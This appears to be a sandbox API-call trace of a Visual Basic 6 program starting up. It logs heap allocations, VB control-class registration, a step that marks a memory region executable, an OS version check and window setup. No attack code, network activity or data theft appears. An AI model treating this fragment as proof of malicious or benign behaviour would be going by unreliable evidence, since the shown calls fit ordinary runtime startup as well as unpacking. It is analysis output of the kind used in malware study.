0x30f46f0 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f3178 [0083.531] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x30f31c8, Size=0x50) returned 0x30f4748 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f47a0 [0083.531] lstrlenA (lpString="VB") returned 2 [0083.531] lstrlenA (lpString="Screen") returned 6 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xa) returned 0x30f31c8 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x2c) returned 0x30f48c0 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xa0) returned 0x30f48f8 [0083.532] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f49a0 [0083.532] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f49c0 [0083.532] lstrlenA (lpString="VB") returned 2 [0083.532] lstrlenA (lpString="Clipboard") returned 9 [0083.532] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xd) returned 0x30f31e0 [0083.532] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x1c) returned 0x30f4ae0 [0083.532] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x68) returned 0x30f4b08 [0083.532] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f4b78 [0083.532] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f4b98 [0083.533] lstrlenA (lpString="VB") returned 2 [0083.533] lstrlenA (lpString="MDIForm") returned 7 [0083.533] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xb) returned 0x30f4cb8 [0083.533] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x184) returned 0x30f4cd0 [0083.533] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x7c) returned 0x30f4e60 [0083.533] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x2f8) returned 0x30f4ee8 [0083.533] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f51e8 [0083.533] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f5208 [0083.533] lstrlenA (lpString="VB") returned 2 [0083.533] lstrlenA (lpString="App") returned 3 [0083.533] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x7) returned 0x30f3198 [0083.534] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x84) returned 0x30f5328 [0083.534] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x148) returned 0x30f53b8 [0083.534] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f5508 [0083.534] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f5528 [0083.534] lstrlenA (lpString="VB") returned 2 [0083.534] lstrlenA (lpString="UserControl") returned 11 [0083.534] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xf) returned 0x30f5648 [0083.534] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x1e4) returned 0x30f5660 [0083.534] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xb0) returned 0x30f5850 [0083.534] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x3a4) returned 0x30f5908 [0083.535] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x30f46f0, Size=0x78) returned 0x30f5cb8 [0083.535] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f46f0 [0083.535] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x30f4748, Size=0x78) returned 0x30f5d38 [0083.535] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f5db8 [0083.535] lstrlenA (lpString="VB") returned 2 [0083.535] lstrlenA (lpString="PropertyPage") returned 12 [0083.535] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x10) returned 0x30f4710 [0083.535] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x190) returned 0x30f5ed8 [0083.536] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x88) returned 0x30f6070 [0083.536] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x310) returned 0x30f6100 [0083.536] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0083.536] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f4728 [0083.536] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f6418 [0083.536] lstrlenA (lpString="VB") returned 2 [0083.536] lstrlenA (lpString="UserDocument") returned 12 [0083.536] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x10) returned 0x30f4748 [0083.536] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x1c8) returned 0x30f6538 [0083.536] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xa8) returned 0x30f6708 [0083.537] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x370) returned 0x30f67b8 [0083.537] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f4760 [0083.537] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x20) returned 0x3101398 [0083.542] RtlAllocateHeap (HeapHandle=0x3cd0000, Flags=0x8, Size=0x30) returned 0x3cd08f0 [0083.543] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xa0) returned 0x31013c0 [0083.543] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x3101468 [0083.543] GetCurrentThreadId () returned 0xf38 [0083.543] GetCurrentThreadId () returned 0xf38 [0083.543] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x10) returned 0x30f4780 [0083.544] RtlAllocateHeap (HeapHandle=0x3cd0000, Flags=0x8, Size=0x30) returned 0x3cd0928 [0083.544] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xa0) returned 0x3101498 [0083.544] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x3101540 [0083.544] GetCurrentThreadId () returned 0xf38 [0083.545] GetCurrentThreadId () returned 0xf38 [0083.545] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x10) returned 0x3101570 [0083.545] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3101588 [0083.545] lstrlenA (lpString="VB") returned 2 [0083.545] lstrlenA (lpString="Label") returned 5 [0083.545] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9) returned 0x31016a8 [0083.545] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x34) returned 0x31016c0 [0083.545] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xf0) returned 0x3101700 [0083.545] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x48) returned 0x31017f8 [0083.545] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1f4) returned 0x3101848 [0083.545] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3101a48 [0083.546] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3101a68 [0083.546] lstrlenA (lpString="VB") returned 2 [0083.546] lstrlenA (lpString="Frame") returned 5 [0083.546] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9) returned 0x3101ba0 [0083.546] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x24) returned 0x3102388 [0083.546] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xb0) returned 0x31023b8 [0083.546] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x34) returned 0x3102470 [0083.546] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x184) returned 0x31024b0 [0083.547] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102658 [0083.547] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3102e40 [0083.547] lstrlenA (lpString="VB") returned 2 [0083.547] lstrlenA (lpString="CheckBox") returned 8 [0083.547] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xc) returned 0x3101bb8 [0083.547] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x3102f60 [0083.547] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xec) returned 0x3102f90 [0083.547] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x48) returned 0x3103088 [0083.547] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1f8) returned 0x31030d8 [0083.547] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x30f5cb8, Size=0xa0) returned 0x31032d8 [0083.548] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102678 [0083.548] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x30f5d38, Size=0xa0) returned 0x3103380 [0083.548] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3103428 [0083.548] lstrlenA (lpString="VB") returned 2 [0083.548] lstrlenA (lpString="OptionButton") returned 12 [0083.548] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x10) returned 0x3101bd0 [0083.548] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x30f5cb8 [0083.548] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xd4) returned 0x3103548 [0083.548] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x4c) returned 0x30f5ce8 [0083.548] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1c8) returned 0x3103628 [0083.548] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102698 [0083.549] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3103810 [0083.549] lstrlenA (lpString="VB") returned 2 [0083.549] lstrlenA (lpString="ComboBox") returned 8 [0083.549] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xc) returned 0x3101be8 [0083.549] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x108) returned 0x31057f8 [0083.549] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x4c) returned 0x30f5d40 [0083.549] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x230) returned 0x3105908 [0083.549] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x31026b8 [0083.549] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3103938 [0083.549] lstrlenA (lpString="VB") returned 2 [0083.550] lstrlenA (lpString="ListBox") returned 7 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xb) returned 0x3101c00 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x108) returned 0x3105b40 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x54) returned 0x3105c50 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x230) returned 0x3105cb0 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x31026d8 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3103a60 [0083.550] lstrlenA (lpString="VB") returned 2 [0083.550] lstrlenA (lpString="HScrollBar") returned 10 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xe) returned 0x3101c18 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x24) returned 0x3105ee8 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x90) returned 0x3105f18 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x3105fb0 [0083.550] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x144) returned 0x3105fe8 [0083.551] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x31026f8 [0083.551] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3103b88 [0083.551] lstrlenA (lpString="VB") returned 2 [0083.551] lstrlenA (lpString="VScrollBar") returned 10 [0083.551] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xe) returned 0x3101c30 [0083.551] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x24) returned 0x3106138 [0083.551] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x90) returned 0x3106168 [0083.551] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x3106200 [0083.552] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x144) returned 0x3106230 [0083.552] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x31032d8, Size=0xc8) returned 0x3106380 [0083.552] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102718 [0083.552] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x3103380, Size=0xc8) returned 0x3106450 [0083.552] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3103cb0 [0083.552] lstrlenA (lpString="VB") returned 2 [0083.552] lstrlenA (lpString="DriveListBox") returned 12 [0083.552] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x10) returned 0x3101c48 [0083.552] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x31032d8 [0083.552] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xc0) returned 0x3103308 [0083.552] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x40) returned 0x31033d0 [0083.552] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1a0) returned 0x3106520 [0083.553] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102738 [0083.553] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3103dd8 [0083.553] lstrlenA (lpString="VB") returned 2 [0083.553] lstrlenA (lpString="DirListBox") returned 10 [0083.553] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xe) returned 0x3101c60 [0083.553] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x31066c8 [0083.553] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xc8) returned 0x31066f8 [0083.553] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x50) returned 0x31067c8 [0083.553] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1b0) returned 0x3106820 [0083.553] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102758 [0083.555] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3103f00 [0083.555] lstrlenA (lpString="VB") returned 2 [0083.555] lstrlenA (lpString="FileListBox") returned 11 [0083.555] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xf) returned 0x3101c78 [0083.555] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x31069d8 [0083.555] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xec) returned 0x3106a08 [0083.555] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x58) returned 0x3106b00 [0083.556] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1f8) returned 0x3106b60 [0083.556] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102778 [0083.556] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3104028 [0083.556] lstrlenA (lpString="VB") returned 2 [0083.556] lstrlenA (lpString="Menu") returned 4 [0083.556] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x8) returned 0x3103418 [0083.556] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x38) returned 0x3106d60 [0083.556] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x4) returned 0x30f5d98 [0083.556] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xb8) returned 0x3106da0 [0083.557] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102798 [0083.557] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3104150 [0083.557] lstrlenA (lpString="VB") returned 2 [0083.557] lstrlenA (lpString="Shape") returned 5 [0083.557] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9) returned 0x3101c90 [0083.557] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x1c) returned 0x3106e60 [0083.557] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x68) returned 0x3106e88 [0083.557] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xfc) returned 0x3106ef8 [0083.558] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x3106380, Size=0xf0) returned 0x3107000 [0083.558] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x31027b8 [0083.558] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x3106450, Size=0xf0) returned 0x31070f8 [0083.558] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x3104278 [0083.558] lstrlenA (lpString="VB") returned 2 [0083.558] lstrlenA (lpString="Line") returned 4 [0083.558] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x8) returned 0x30f5da8 [0083.558] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x31027d8 [0083.558] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x50) returned 0x3106380 [0083.558] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xd0) returned 0x31063d8 [0083.559] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x31027f8 [0083.559] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x31043a0 [0083.559] lstrlenA (lpString="VB") returned 2 [0083.559] lstrlenA (lpString="Image") returned 5 [0083.559] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9) returned 0x3101ca8 [0083.559] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x24) returned 0x31064b0 [0083.559] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x98) returned 0x31071f0 [0083.559] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x34) returned 0x31064e0 [0083.559] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x154) returned 0x3107290 [0083.559] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102818 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x31044c8 [0083.560] lstrlenA (lpString="VB") returned 2 [0083.560] lstrlenA (lpString="Data") returned 4 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x8) returned 0x31073f0 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xd8) returned 0x3107400 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x3c) returned 0x31074e0 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1d8) returned 0x3107528 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102838 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x31045f0 [0083.560] lstrlenA (lpString="VB") returned 2 [0083.560] lstrlenA (lpString="OLE") returned 3 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x7) returned 0x3107708 [0083.560] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x17c) returned 0x3107718 [0083.561] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x40) returned 0x31078a0 [0083.561] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x2f0) returned 0x31078e8 [0083.561] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102858 [0083.564] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0xe3efe8 [0083.564] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0xe3e7f0 [0083.564] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0xe3f820 [0083.564] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0xe42668 [0083.564] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0xe3a860 [0083.564] IMalloc:Alloc (This=0x76da66bc, cb=0xc) returned 0xe3ec68 [0083.564] IMalloc:Alloc (This=0x76da66bc, cb=0x7c) returned 0xe49e28 [0083.564] IMalloc:GetSize (This=0x76da66bc, pv=0xe49e28) returned 0x7c [0083.565] IMalloc:Alloc (This=0x76da66bc, cb=0x20) returned 0xe4a470 [0083.565] GetCurrentThreadId () returned 0xf38 [0083.565] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x54) returned 0x3107be0 [0083.565] GetCurrentThreadId () returned 0xf38 [0083.565] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0xe4a498 [0083.565] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x104) returned 0x3107c40 [0083.566] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x6f8) returned 0x3107d50 [0083.566] VirtualProtect (in: lpAddress=0x3e0000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x28fd90 | out: lpflOldProtect=0x28fd90*=0x20) returned 1 [0083.566] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3e0000, dwSize=0x6000) returned 1 [0083.566] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.567] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.567] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xd4) returned 0x3108450 [0083.567] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.568] VirtualAlloc (lpAddress=0x3e0000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.568] VirtualProtect (in: lpAddress=0x3e0000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x28fd90 | out: lpflOldProtect=0x28fd90*=0x4) returned 1 [0083.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3e0000, dwSize=0xa000) returned 1 [0083.570] GetCurrentThreadId () returned 0xf38 [0083.570] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x23ec) returned 0x3108530 [0083.590] SetWindowTextA (hWnd=0x6006a, lpString="Using Shell32.dll") returned 1 [0083.590] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0xc, wParam=0x0, lParam=0x28fd04) returned 0x1 [0083.590] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x28fcec | out: phkResult=0x28fcec*=0x0) returned 0x2 [0083.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0083.596] VirtualQuery (in: lpAddress=0x28f718, lpBuffer=0x28f6fc, dwLength=0x1c | out: lpBuffer=0x28f6fc*(BaseAddress=0x28f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.597] IMalloc:Alloc (This=0x76da66bc, cb=0x6c) returned 0xe4d9e8 [0083.598] IMalloc:GetSize (This=0x76da66bc, pv=0xe4d9e8) returned 0x6c [0083.599] GetCurrentThreadId () returned 0xf38 [0083.599] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x104) returned 0x310a928 [0083.599] GetCurrentThreadId () returned 0xf38 [0083.599] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x178) returned 0x310aa38 [0083.600] GetCurrentThreadId () returned 0xf38 [0083.605] GetCurrentThreadId () returned 0xf38 [0083.605] GetCurrentThreadId () returned 0xf38 [0083.606] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x140) returned 0x310abb8 [0083.606] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x10) returned 0x3101cc0 [0083.606] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x434) returned 0x310ad00 [0083.606] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x138 [0083.609] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x198) returned 0x310b140 [0083.609] GetVersionExA (in: lpVersionInformation=0x28fa14*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x11013c4, dwMinorVersion=0x28f964, dwBuildNumber=0x28fc00, dwPlatformId=0x28ff08, szCSDVersion="Í\x1e­w\x1e\x15Ñ\x01þÿÿÿ£<©wÎ<©w\x98\x01") | out: lpVersionInformation=0x28fa14*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0083.609] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0083.610] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102878 [0083.610] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x14) returned 0x3102898 [0083.610] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x80) returned 0x310b2e0 [0083.610] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310b2e0 | out: hHeap=0x30f0000) returned 1 [0083.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MS Sans Serif", cbMultiByte=-1, lpWideCharStr=0x28fa3c, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0083.610] OleCreateFontIndirect () returned 0x0 [0083.619] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0xb0173 [0083.621] OleCreatePictureIndirect () returned 0x0 [0083.622] lstrlenA (lpString="Form1") returned 5 [0083.622] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x6) returned 0x310b2e0 [0083.622] lstrlenA (lpString="ThunderRT6") returned 10 [0083.622] lstrcpyA (in: lpString1=0x28fa50, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.622] lstrlenA (lpString="ThunderRT6Form") returned 14 [0083.622] lstrcpynA (in: lpString1=0x28fa5e, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0083.623] lstrlenA (lpString="ThunderRT6") returned 10 [0083.623] lstrcpyA (in: lpString1=0x28f9e4, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.623] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x28fa10 | out: lpWndClass=0x28fa10) returned 0 [0083.623] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0083.623] RegisterClassA (lpWndClass=0x28fa10) returned 0x57c1c5 [0083.623] lstrlenA (lpString="ThunderRT6") returned 10 [0083.623] lstrcpyA (in: lpString1=0x28f9e4, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.623] lstrlenA (lpString="ThunderRT6Form") returned 14 [0083.623] lstrcpynA (in: lpString1=0x28f9f2, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0083.623] RegisterClassA (lpWndClass=0x28fa10) returned 